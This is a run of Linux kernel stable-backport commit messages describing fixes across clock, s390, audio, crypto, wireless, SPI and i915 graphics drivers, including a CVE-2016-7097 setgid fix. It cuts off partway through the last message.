Before commit 0861e5b8cf (clk: Add clk_hw OF clk providers,
2016-02-05) __of_clk_get_from_provider() would return an error
pointer of the provider's choosing if there was a provider
registered and EPROBE_DEFER otherwise. After that commit, it
would return EPROBE_DEFER regardless of whether or not the
provider returned an error. This is odd and can lead to behavior
where clk consumers keep probe deferring when they should be
seeing some other error.
Let's restore the previous behavior where we only return
EPROBE_DEFER when there isn't a provider in our of_clk_providers
list. Otherwise, return the error from the last provider we find
that matches the node.
Reported-by: Masahiro Yamada <yamada.masahiro@socionext.com>
Fixes: 0861e5b8cf ("clk: Add clk_hw OF clk providers")
Signed-off-by: Stephen Boyd <sboyd@codeaurora.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 8964193f6b upstream.
The offset of Core Cluster clock control/status register
on cluster group V3 version is different from others, and
should be plus 0x70000.
Signed-off-by: Tang Yuantian <yuantian.tang@nxp.com>
Reviewed-by: Scott Wood <oss@buserror.net>
Fixes: 9e19ca2f62 ("clk: qoriq: Add ls2080a support.")
Signed-off-by: Stephen Boyd <sboyd@codeaurora.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 6d91f2c014 upstream.
This patch selects QCOM_GDSC Kconfig for msm8996 GCC and MMCC clock
controllers, as these provide some of the gdscs on the SOC.
Also selecting this config will make it align with other drivers which
do the same.
Signed-off-by: Srinivas Kandagatla <srinivas.kandagatla@linaro.org>
Fixes: 52111672f7 ("clk: qcom: gdsc: Add GDSCs in msm8996 GCC")
Fixes: 7e824d5079 ("clk: qcom: gdsc: Add mmcc gdscs for msm8996 family")
Signed-off-by: Stephen Boyd <sboyd@codeaurora.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit ce61966c05 upstream.
This patch corrects the register offset for pcie2 pipe clock.
Offset according to datasheet is 0x6e018 instead of 0x6e108.
Signed-off-by: Srinivas Kandagatla <srinivas.kandagatla@linaro.org>
Fixes: b1e010c073 ("clk: qcom: Add MSM8996 Global Clock Control (GCC) driver")
Signed-off-by: Stephen Boyd <sboyd@codeaurora.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 67615c588a upstream.
If the firmware had set up a clock to source from PLLC, go along with
it. But if we're looking for a new parent, we don't want to switch it
to PLLC because the firmware will force PLLC (and thus the AXI bus
clock) to different frequencies during over-temp/under-voltage,
without notification to Linux.
On my system, this moves the Linux-enabled HDMI state machine and DSI1
escape clock over to plld_per from pllc_per. EMMC still ends up on
pllc_per, because the firmware had set it up to use that.
Signed-off-by: Eric Anholt <eric@anholt.net>
Fixes: 41691b8862 ("clk: bcm2835: Add support for programming the audio domain clocks")
Acked-by: Martin Sperl <kernel@martin.sperl.org>
Signed-off-by: Stephen Boyd <sboyd@codeaurora.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 6cd997db91 upstream.
con3270 contains an optimisation that reduces the amount of data to be
transmitted to the 3270 terminal by putting a Repeat to Address (RA)
order into the data stream. The RA order itself takes up space, so
con3270 only uses it if there's enough space left in the line
buffer. Otherwise it just pads out the line manually.
For lines that were _just_ short enough that the RA order still fit in
the line buffer, the line was instead padded with an insufficient
amount of spaces. This was caused by examining the size of the
allocated line buffer rather than the length of the string to be
displayed.
For con3270_cline_end(), we just compare against the line length. For
con3270_update_string() however that isn't available anymore, so we
check whether the Repeat to Address order is present.
Fixes: f51320a5 ("[PATCH] s390: new 3270 driver.") (tglx/history.git)
Tested-by: Jing Liu <liujbjl@linux.vnet.ibm.com>
Tested-by: Yang Chen <bjcyang@linux.vnet.ibm.com>
Signed-off-by: Sascha Silbe <silbe@linux.vnet.ibm.com>
Signed-off-by: Martin Schwidefsky <schwidefsky@de.ibm.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit c14f2aac7a upstream.
con3270 contains an optimisation that reduces the amount of data to be
transmitted to the 3270 terminal by putting a Repeat to Address (RA)
order into the data stream. The RA order itself takes up space, so
con3270 only uses it if there's enough space left in the line
buffer. Otherwise it just pads out the line manually.
For lines too long to include the RA order, one byte was left
uninitialised. This was caused by an off-by-one bug in the loop that
pads out the line. Since the buffer is allocated from a common pool,
the single byte left uninitialised contained some previous buffer
content. Usually this was just a space or some character (which can
result in clutter but is otherwise harmless). Sometimes, however, it
was a Repeat to Address order, messing up the entire screen layout and
causing the display to send the entire buffer content on every
keystroke.
Fixes: f51320a5 ("[PATCH] s390: new 3270 driver.") (tglx/history.git)
Reported-by: Liu Jing <liujbjl@linux.vnet.ibm.com>
Tested-by: Jing Liu <liujbjl@linux.vnet.ibm.com>
Tested-by: Yang Chen <bjcyang@linux.vnet.ibm.com>
Signed-off-by: Sascha Silbe <silbe@linux.vnet.ibm.com>
Signed-off-by: Martin Schwidefsky <schwidefsky@de.ibm.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit d53c51f261 upstream.
Since commit 9f3d6d7 chsc_get_channel_measurement_chars is called with
interrupts disabled during resume from hibernate. Since this function
used spin_unlock_irq, interrupts have been enabled accidentally. Fix
this by using the irqsave variant.
Since we can't guarantee the IRQ-enablement state for all (future/
external) callers, change the locking in related functions to prevent
similar bugs in the future.
Fixes: 9f3d6d7 ("s390/cio: update measurement characteristics")
Signed-off-by: Sebastian Ott <sebott@linux.vnet.ibm.com>
Reviewed-by: Peter Oberparleiter <oberpar@linux.vnet.ibm.com>
Signed-off-by: Martin Schwidefsky <schwidefsky@de.ibm.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit a19440304d upstream.
When a view destruction command was present in the command stream, the
view was validated to avoid a device error. That caused excessive and
unnecessary validations of views, surfaces and mobs on view destruction.
Replace this with a new relocation type that patches the view
destruction command to a NOP if the view is not present in the device
after the execbuf validation sequence.
Also add checks for the member size of the vmw_res_relocation struct.
Fixes sporadic command submission errors on google-earth exit.
Reported-by: Brian Paul <brianp@vmware.com>
Signed-off-by: Thomas Hellstrom <thellstrom@vmware.com>
Reviewed-by: Brian Paul <brianp@vmware.com>
Reviewed-by: Sinclair Yeh <syeh@vmware.com>
Signed-off-by: Sinclair Yeh <syeh@vmware.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 86c7e68364 upstream.
A workaround for a warning introduced a use of the NO_IRQ
macro that should have been gone for a long time.
It is clear from the code that the value cannot actually
be used, but apparently there was a configuration at
some point that caused a warning, so instead of just
reverting that patch, this rearranges the code in a way that
the warning cannot reappear.
Signed-off-by: Arnd Bergmann <arnd@arndb.de>
Fixes: 6ef41cf6f7 ("dmaengine :ipu: change ipu_irq_handler() to remove compile warning")
Signed-off-by: Vinod Koul <vinod.koul@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 0610735928 upstream.
bq->charger is initialized in bq24257_power_supply_init.
Therefore, bq24257_power_supply_init should be called before the
registration of the IRQ handler bq24257_irq_handler_thread that calls
power_supply_changed(bq->charger).
Signed-off-by: Georges Savoundararadj <savoundg@gmail.com>
Cc: Aurelien Chanot <chanot.a@gmail.com>
Cc: Andreas Dannenberg <dannenberg@ti.com>
Cc: Sebastian Reichel <sre@kernel.org>
Cc: David Woodhouse <dwmw2@infradead.org>
Fixes: 2219a93596 ("power_supply: Add TI BQ24257 charger driver")
Signed-off-by: Sebastian Reichel <sre@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 84b3adc243 upstream.
There is no need to have a global qpt_mask as that does not support the
multiple chip model which qib has. Instead rely on the value which
exists already in the device data (dd).
Fixes: 898fa52b4a "IB/qib: Remove qpn, qp tables and related variables from qib"
Reviewed-by: Mike Marciniszyn <mike.marciniszyn@intel.com>
Signed-off-by: Dennis Dalessandro <dennis.dalessandro@intel.com>
Signed-off-by: Doug Ledford <dledford@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 9afe11e956 upstream.
Private functions in ks_hostif.c can be declared static.
Fixes: 13a9930d15 ("staging: ks7010: add driver from Nanonote extra-repository")
Signed-off-by: Nicholas Mc Guire <hofrat@osadl.org>
Reviewed-by: Wolfram Sang <wsa@the-dreams.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 9d29f14db1 upstream.
wait_for_completion_interruptible_timeout return 0 on timeout and
-ERESTARTSYS if interrupted. The check for
!wait_for_completion_interruptible_timeout() would report an interrupt
as timeout. Further, while HZ/50 will work most of the time it could
fail for HZ < 50, so this is switched to msecs_to_jiffies(20).
Fixes: 13a9930d15 ("staging: ks7010: add driver from Nanonote extra-repository")
Signed-off-by: Nicholas Mc Guire <hofrat@osadl.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 1335a9516d upstream.
Commit fadbe0cd52 ("staging: rtl8188eu:
Remove rtw_zmalloc(), wrapper for kzalloc()") changed all allocation
calls to be GFP_KERNEL even though the original wrapper was testing
to determine if the caller was in atomic mode. Most of the mistakes
were corrected with commit 33dc85c3c6
("staging: r8188eu: Fix scheduling while atomic error introduced in
commit fadbe0cd"); however, two kzalloc calls were missed as the
call only happens when the driver is shutting down.
Fixes: fadbe0cd52 ("staging: rtl8188eu: Remove rtw_zmalloc(), wrapper for kzalloc()")
Signed-off-by: Larry Finger <Larry.Finger@lwfinger.net>
Cc: navin patidar <navin.patidar@gmail.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 992f961480 upstream.
Commit 6fba39cf32 ("staging: sm750fb: use BIT macro for
PANEL_DISPLAY_CTRL single-bit fields") accidentally changed the
CLOCK_PHASE logic from '|=' to '=' which clears all the previously set
bits.
Fixes: 6fba39cf32 ("staging: sm750fb: use BIT macro for PANEL_DISPLAY_CTRL single-bit fields")
Signed-off-by: Phil Turnbull <phil.turnbull@oracle.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 4a236d01b5 upstream.
The newly added Hi6220 Ion code fails to build when the ION_OF helpers
are not present:
drivers/staging/android/ion/hisilicon/hi6220_ion.o: In function `hi6220_ion_remove':
hi6220_ion.c:(.text.hi6220_ion_remove+0x4c): undefined reference to `ion_destroy_platform_data'
drivers/staging/android/ion/hisilicon/hi6220_ion.o: In function `hi6220_ion_probe':
hi6220_ion.c:(.text.hi6220_ion_probe+0x5c): undefined reference to `ion_parse_dt'
hi6220_ion.c:(.text.hi6220_ion_probe+0xf8): undefined reference to `ion_destroy_platform_data'
This selects the symbol when needed.
Fixes: 2b40182a19 ("staging: android: ion: Add ion driver for Hi6220 SoC platform")
Signed-off-by: Arnd Bergmann <arnd@arndb.de>
Acked-by: Laura Abbott <labbott@redhat.com>
Reviewed-by: Sumit Semwal <sumit.semwal@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 9d47964bfd upstream.
The comparison for devnr limits is off-by-one, the current check
allows 0 to AD5755_NUM_CHANNELS and the limit should be in fact
0 to AD5755_NUM_CHANNELS - 1. This can lead to an out of bounds
write to pdata->dac[devnr]. Fix this by replacing > with >= on the
comparison.
Signed-off-by: Colin Ian King <colin.king@canonical.com>
Fixes: c947459979 ("iio: ad5755: add support for dt bindings")
Signed-off-by: Jonathan Cameron <jic23@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit a3930ed060 upstream.
Commit d88429a695 ("ASoC: dapm: Add output driver widget") added
the snd_soc_dapm_out_drv ID for the output driver widget, which is
the same as the PGA widget, with a later power sequence number.
Commit 19a2557b76 ("ASoC: dapm: Add kcontrol support for PGAs")
then added kcontrol support for PGA widgets, but failed to account
for output driver widgets. Attempts to use kcontrols with output
driver widgets result in silent failures, with the developer having
little idea about what went on.
Add snd_soc_dapm_out_drv to the switch/case block under snd_soc_dapm_pga
in dapm_create_or_share_kcontrol, since they are essentially the same.
Fixes: 19a2557b76 (ASoC: dapm: Add kcontrol support for PGAs)
Signed-off-by: Chen-Yu Tsai <wens@csie.org>
Signed-off-by: Mark Brown <broonie@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 071133a209 upstream.
The value for the second channel in _ENUM_DOUBLE (double channel) MUXs
is not correctly updated, due to using the wrong bit shift.
Use the correct bit shift, so both channels toggle together.
Fixes: 3727b49684 (ASoC: dapm: Consolidate MUXs and value MUXs)
Signed-off-by: Chen-Yu Tsai <wens@csie.org>
Reviewed-by: Charles Keepax <ckeepax@opensource.wolfsonmicro.com>
Signed-off-by: Mark Brown <broonie@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 01ad5e7de6 upstream.
If soc_dapm_read() fails, val will be uninitialized, and bogus values
will be written later:
ret = soc_dapm_read(dapm, reg, &val);
val = (val >> shift) & mask;
However, the compiler does not give a warning. Return on error before
val is really used to avoid this.
This is similar to the commit 6912831623 ("ASoC: dapm: Fix
uninitialized variable in snd_soc_dapm_get_enum_double()")
Fixes: ce0fc93ae5 (ASoC: Add DAPM support at the component level)
Signed-off-by: Chen-Yu Tsai <wens@csie.org>
Signed-off-by: Mark Brown <broonie@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 8ae3ea48df upstream.
Fix to return error code -ENOMEM instead of 0 when failed to create
widget, as done elsewhere in this function.
Fixes: 8a9782346d ("ASoC: topology: Add topology core")
Signed-off-by: Wei Yongjun <weiyj.lk@gmail.com>
Signed-off-by: Mark Brown <broonie@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit ad8529fde9 upstream.
Currently omap-rng checks the return value of pm_runtime_get_sync and
reports failure if anything is returned, however it should be checking
if ret < 0 as pm_runtime_get_sync return 0 on success but also can return
1 if the device was already active which is not a failure case. Only
values < 0 are actual failures.
Fixes: 61dc0a446e ("hwrng: omap - Fix assumption that runtime_get_sync will always succeed")
Signed-off-by: Dave Gerlach <d-gerlach@ti.com>
Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit ed4767d612 upstream.
Since commit 8996eafdcb ("crypto: ahash - ensure statesize is non-zero"),
all ahash drivers are required to implement import()/export(), and must have
a non-zero statesize. Fix this for the ARM Crypto Extensions GHASH
implementation.
Fixes: 8996eafdcb ("crypto: ahash - ensure statesize is non-zero")
Signed-off-by: Ard Biesheuvel <ard.biesheuvel@linaro.org>
Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 09951d83fc upstream.
So far, sub part of mv_cesa_int was responsible of dequeuing complete
requests, then call the 'cleanup' operation on these reqs and call the
crypto api callback 'complete'. The problem is that the transformation
context 'ctx' is retrieved only once before the while loop. Which means
that the wrong 'cleanup' operation might be called on the wrong type of
cesa requests, it can lead to memory corruptions with this message:
marvell-cesa f1090000.crypto: dma_pool_free cesa_padding, 5a5a5a5a/5a5a5a5a (bad dma)
This commit fixes the issue, by updating the transformation context for
each dequeued cesa request.
Fixes: commit 85030c5168 ("crypto: marvell - Add support for chai...")
Signed-off-by: Romain Perier <romain.perier@free-electrons.com>
Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 50d2e6dc1f upstream.
The cipher block size for GCM is 16 bytes, and thus the CTR transform
used in crypto_gcm_setkey() will also expect a 16-byte IV. However,
the code currently reserves only 8 bytes for the IV, causing
an out-of-bounds access in the CTR transform. This patch fixes
the issue by setting the size of the IV buffer to 16 bytes.
Fixes: 84c9115230 ("[CRYPTO] gcm: Add support for async ciphers")
Signed-off-by: Ondrej Mosnacek <omosnacek@gmail.com>
Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 57cfda1ac7 upstream.
Currently, in mv_cesa_{md5,sha1,sha256}_init creq->state is initialized
before the call to mv_cesa_ahash_init. This is wrong because this
function fills creq with zero by using memset, so its 'state' that
contains the default DIGEST is overwritten. This commit fixes the issue
by initializing creq->state just after the call to mv_cesa_ahash_init.
Fixes: commit b0ef51067c ("crypto: marvell/cesa - initialize hash...")
Signed-off-by: Romain Perier <romain.perier@free-electrons.com>
Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 18f53fe0f3 upstream.
commit 7a0adc83f3 ("ath10k: improve tx scheduling") is causing
severe throughput drop in multi client mode. This issue is originally
reported in veriwave setup with 50 clients with TCP downlink traffic.
While increasing number of clients, the average throughput drops
gradually. With 50 clients, the combined peak throughput is decreased
to 98 Mbps whereas reverting given commit restored it to 550 Mbps.
Processing txqs for every tx completion is causing overhead. Ideally for
management frame tx completion, pending txqs processing can be avoided.
The change partly reverts the commit "ath10k: improve tx scheduling".
Processing pending txqs after all skbs tx completion will yeild enough
room to burst tx frames.
Fixes: 7a0adc83f3 ("ath10k: improve tx scheduling")
Signed-off-by: Rajkumar Manoharan <rmanohar@qti.qualcomm.com>
Signed-off-by: Kalle Valo <kvalo@qca.qualcomm.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 77eb3d6931 upstream.
When user requests for survey dump data, driver is providing wrong survey
information. This information we sent is the survey data that we have
collected during previous user request.
This issue occurs because we request survey dump for wrong channel. With
this change, we correctly display the correct and current survey
information to userspace.
Fixes: fa7937e3d5 ("ath10k: update bss channel survey information")
Signed-off-by: Ashok Raj Nagarajan <arnagara@qti.qualcomm.com>
Signed-off-by: Kalle Valo <kvalo@qca.qualcomm.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit e4fd726f21 upstream.
In the wake tx queue path, we are not checking if the frame to be sent
takes management path or not. For eg. QOS null func frame coming here will
take the management path. Since we are not incrementing the descriptor
counter (num_pending_mgmt_tx) w.r.t tx management, on tx completion it is
possible to see negative values.
When the above counter reaches a negative value, we will not be sending a
probe response out.
if (is_presp &&
ar->hw_params.max_probe_resp_desc_thres < htt->num_pending_mgmt_tx)
For IPQ4019, max_probe_resp_desc_thres (u32) is 24 is compared against
num_pending_mgmt_tx (int) and the above condtions comes true if the counter
is negative and we drop the probe response.
To avoid this, check on the wake tx queue path as well for the tx path of
the frame and increment the appropriate counters
Fixes: cac085524c "ath10k: move mgmt descriptor limit handle under mgmt_tx"
Signed-off-by: Ashok Raj Nagarajan <arnagara@qti.qualcomm.com>
Signed-off-by: Kalle Valo <kvalo@qca.qualcomm.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 64ed5771ac upstream.
WMI_SERVICE_PERIODIC_CHAN_STAT_SUPPORT service has missed in
the commit 7e247a9e88 ("ath10k: add dynamic tx mode switch
config support for qca4019"). This patch adds the service to
avoid mismatch between host and target.
Fixes: 7e247a9e88 ("ath10k: add dynamic tx mode switch config support for qca4019")
Signed-off-by: Tamizh chelvam <c_traja@qti.qualcomm.com>
Signed-off-by: Kalle Valo <kvalo@qca.qualcomm.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit c8ccf3ade7 upstream.
Recent patch "mwifiex: fix NULL pointer" skips extended scan event
handling when suspend is in progress. It created a problem for scan
after interface disabled/enabled case.
This patch solves the problem by checking netif_running() status.
Fixes:16d25da94f3d654 ("mwifiex: fix NULL pointer dereference during suspend")
Signed-off-by: Amitkumar Karwar <akarwar@marvell.com>
Signed-off-by: Kalle Valo <kvalo@codeaurora.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit b64db1b252 upstream.
AID gets updated during TDLS setup, but modified value isn't reflected
in "priv->assoc_rsp_buf". This causes TDLS setup failure. The problem is
fixed here.
Fixes: 4aff53ef18 ("mwifiex: parsing aid while receiving..")
Signed-off-by: Xinming Hu <huxm@marvell.com>
Signed-off-by: Amitkumar Karwar <akarwar@marvell.com>
Signed-off-by: Kalle Valo <kvalo@codeaurora.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 6999aeabbb upstream.
The call sequence spi_alloc_master/spi_register_master/spi_unregister_master
is complete; it reduces the device reference count to zero, which and results
in device memory being freed. The subsequent call to spi_master_put is
unnecessary and results in an access to free memory. Drop it.
Fixes: 9298bc7273 ("spi: spi-fsl-dspi: Remove spi-bitbang")
Signed-off-by: Wei Yongjun <weiyj.lk@gmail.com>
Signed-off-by: Mark Brown <broonie@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 4d31a2588a upstream.
The variable i contains a total number of resources (including
IORESOURCE_IRQ). However, we want the dmem_region_start to point
after the last resource of type IORESOURCE_MEM. The original behaviour
leads (very likely) to skipping several UIO mapping regions and makes
them useless. Fix this by computing dmem_region_start from the uiomem
which points to the last used UIO mapping.
Fixes: 0a0c3b5a24 ("Add new uio device for dynamic memory allocation")
Signed-off-by: Jan Viktorin <viktorin@rehivetech.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 481e46fe7a upstream.
commit de5461970b ("coresight: tmc: allocating memory when needed")
removed the static allocation of buffer for the trace data in ETR mode in
tmc_probe. However it failed to remove the "devm_free_coherent" in
tmc_probe when the probe fails due to other reasons. This patch gets
rid of the incorrect dma_free_coherent() call.
Fixes: commit de5461970b ("coresight: tmc: allocating memory when needed")
Cc: Mathieu Poirier <mathieu.poirier@linaro.org>
Signed-off-by: Suzuki K Poulose <suzuki.poulose@arm.com>
Signed-off-by: Mathieu Poirier <mathieu.poirier@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit ee26c013cd upstream.
Without this patch irq_domain_disassociate() cannot properly release the
interrupt. In fact, irq_map_generic_chip() checks a bit on 'gc->installed'
but said bit is never cleared, only set.
Commit 088f40b7b0 ("genirq: Generic chip: Add linear irq domain support")
added irq_map_generic_chip() function and also stated "This lacks a removal
function for now".
This commit provides an implementation of an unmap function that can be
called by irq_domain_disassociate().
[ tglx: Made the function static and removed the export as we have neither
a prototype nor a modular user. ]
Fixes: 088f40b7b0 ("genirq: Generic chip: Add linear irq domain support")
Signed-off-by: Sebastian Frias <sf84@laposte.net>
Cc: Marc Zyngier <marc.zyngier@arm.com>
Cc: Mason <slash.tmp@free.fr>
Cc: Jason Cooper <jason@lakedaemon.net>
Link: http://lkml.kernel.org/r/579F5C5A.2070507@laposte.net
Signed-off-by: Thomas Gleixner <tglx@linutronix.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit babf985d1e upstream.
Commit 704c4b0ddc ("cxlflash: Shutdown notify support for CXL Flash
cards") was recently introduced to notify the AFU when a system is going
down. Due to the position of the cxlflash driver in the device stack,
cxlflash devices are _always_ removed during a reboot/shutdown. This can
lead to a crash if the cxlflash shutdown hook is invoked _after_ the
shutdown hook for the owning virtual PHB. Furthermore, the current
implementation of shutdown/remove hooks for cxlflash are not tolerant to
being invoked when the device is not enabled. This can also lead to a
crash in situations where the remove hook is invoked after the device
has been removed via the vPHBs shutdown hook. An example of this
scenario would be an EEH reset failure while a reboot/shutdown is in
progress.
To solve both problems, the shutdown hook for cxlflash is updated to
simply remove the device. This path already includes the AFU
notification and thus this solution will continue to perform the
original intent. At the same time, the remove hook is updated to protect
against being called when the device is not enabled.
Fixes: 704c4b0ddc ("cxlflash: Shutdown notify support for CXL Flash
cards")
Signed-off-by: Uma Krishnan <ukrishn@linux.vnet.ibm.com>
Acked-by: Matthew R. Ochs <mrochs@linux.vnet.ibm.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 410280bac6 upstream.
We know that 'retval = 0' because it has been tested a few lines above.
So, if 'devm_kmalloc' fails, 0 will be returned instead of an error code.
Return -ENOMEM instead.
Fixes: 8b4c000931 ("rt2x00usb: Use usb anchor to manage URB")
Signed-off-by: Christophe JAILLET <christophe.jaillet@wanadoo.fr>
Acked-by: Stanislaw Gruszka <sgruszka@redhat.com>
Signed-off-by: Kalle Valo <kvalo@codeaurora.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 073931017b upstream.
When file permissions are modified via chmod(2) and the user is not in
the owning group or capable of CAP_FSETID, the setgid bit is cleared in
inode_change_ok(). Setting a POSIX ACL via setxattr(2) sets the file
permissions as well as the new ACL, but doesn't clear the setgid bit in
a similar way; this allows to bypass the check in chmod(2). Fix that.
References: CVE-2016-7097
Reviewed-by: Christoph Hellwig <hch@lst.de>
Reviewed-by: Jeff Layton <jlayton@redhat.com>
Signed-off-by: Jan Kara <jack@suse.cz>
Signed-off-by: Andreas Gruenbacher <agruenba@redhat.com>
Signed-off-by: Juerg Haefliger <juerg.haefliger@hpe.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit a3fd4c67af upstream.
DPLL_SDVO_HIGH_SPEED must be set for SDVO/HDMI/DP, but nowhere is it
forbidden to set it for LVDS/CRT as well. So let's also set it on
CRT to make it possible to share the DPLL between HDMI and CRT.
What that bit apparently does is enable the x5 clock to the port,
which then pumps out the bits on both edges of the clock. The DAC
doesn't need that clock since it's not pumping out bits, but I don't
think it hurts to have the DPLL output that clock anyway.
This is fairly important on IVB since it has only two DPLLs with three
pipes. So trying to drive three or more PCH ports with three pipes
is only possible when at least one of the DPLLs gets shared between
two of the pipes.
SNB doesn't really need to do this since it has only two pipes. It could
be done to avoid enabling the second DPLL at all in certain cases, but
I'm not sure that's such a huge win. So let's not do it for SNB, at
least for now. On ILK it never makes sense as the DPLLs can't be shared.
v2: Just always enable the high speed clock to keep things simple (Daniel)
Beef up the commit message a bit (Daniel)
Cc: Nick Yamane <nick.diego@gmail.com>
Cc: Daniel Vetter <daniel.vetter@ffwll.ch>
Tested-by: Nick Yamane <nick.diego@gmail.com>
Bugzilla: https://bugs.freedesktop.org/show_bug.cgi?id=97204
Signed-off-by: Ville Syrjälä <ville.syrjala@linux.intel.com>
Link: http://patchwork.freedesktop.org/patch/msgid/1474878646-17711-1-git-send-email-ville.syrjala@linux.intel.com
Reviewed-by: Ander Conselvan de Oliveira <conselvan2@gmail.com>
(cherry picked from commit 7d7f8633a8)
Signed-off-by: Jani Nikula <jani.nikula@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit cf6c525a31 upstream.
The confusing thing is that plane_blocks_per_line is listed as part of
the method 2 calculation but is also used for other things. We
calculated it in two different places and different ways: one inside
skl_wm_method2() and the other inside skl_compute_plane_wm(). The
skl_wm_method2() implementation is the one that matches the
specification.
With this patch we fix the skl_compute_plane_wm() calculation and just
pass it as a parameter to skl_wm_method2(). We also take care to not
modify the value of plane_bytes_per_line since we're going to rely on
it having a correct value in later patches.
This should affect the watermarks for Linear and Y-tiled.
From my analysis, it looks like the two plane_blocks_per_line
variables got out of sync on 0fda65680e, but we can't really say
that commit was a regression, it looks like just an incomplete fix.
There's always the possibility that 0fda65680e matched our
specification at that time, and then later the specification changed.
v2: Try to add a "Fixes" tag (Maarten).
Fixes: 0fda65680e ("drm/i915/skl: Update watermarks for Y tiling")
Cc: Tvrtko Ursulin <tvrtko.ursulin@intel.com>
Reviewed-by: Lyude <cpaul@redhat.com>
Reviewed-by: Maarten Lankhorst <maarten.lankhorst@linux.intel.com>
Signed-off-by: Paulo Zanoni <paulo.r.zanoni@intel.com>
Link: http://patchwork.freedesktop.org/patch/msgid/1474578035-424-7-git-send-email-paulo.r.zanoni@intel.com
(cherry picked from commit 7a1a8aed67)
Signed-off-by: Jani Nikula <jani.nikula@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit be5c571b2f upstream.
We were previously adding all the planes owned by the CRTC even when
the ddb partitioning didn't change for them. As a consequence, a lot
of functions were being called when we were just moving the cursor
around the screen, such as skylake_update_primary_plane().
This was causing flickering on the primary plane when moving the
cursor. I'm not 100% sure which operation caused the flickering, but
we were writing to a lot of registers, so it could be any of these
writes. With this patch, just moving the mouse won't add the primary
plane to the commit since it won't trigger a change in DDB
partitioning.
v2: Use skl_ddb_entry_equal() (Lyude).
v3: Change Reported-and-bisected-by: to Reported-by: for checkpatch
Fixes: 05a76d3d6a ("drm/i915/skl: Ensure pipes with changed wms get added to the state")
Bugzilla: https://bugs.freedesktop.org/show_bug.cgi?id=97888
Cc: Mike Lothian <mike@fireburn.co.uk>
Reported-by: Mike Lothian <mike@fireburn.co.uk>
Signed-off-by: Paulo Zanoni <paulo.r.zanoni@intel.com>
Signed-off-by: Lyude <cpaul@redhat.com>
Link: http://patchwork.freedesktop.org/patch/msgid/1475177808-29955-1-git-send-email-paulo.r.zanoni@intel.com
(cherry picked from commit 7f60e200e2)
Signed-off-by: Jani Nikula <jani.nikula@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit ccebc23b57 upstream.
i915 sometimes needs to disable planes in the middle of an atomic
commit, and then reenable them later in the same commit. Because of
this, we can't make the assumption that the state of the plane actually
changed. Since the state of the plane hasn't actually changed, neither
have it's watermarks. And if the watermarks hasn't changed then we
haven't populated skl_results with anything, which means we'll end up
zeroing out a plane's watermarks in the middle of the atomic commit
without restoring them later.
Simple reproduction recipe:
- Get a SKL laptop, launch any kind of X session
- Get two extra monitors
- Keep hotplugging both displays (so that the display configuration
jumps from 1 active pipe to 3 active pipes and back)
- Eventually underrun
Changes since v1:
- Fix incorrect use of "it's"
Changes since v2:
- Add reproduction recipe
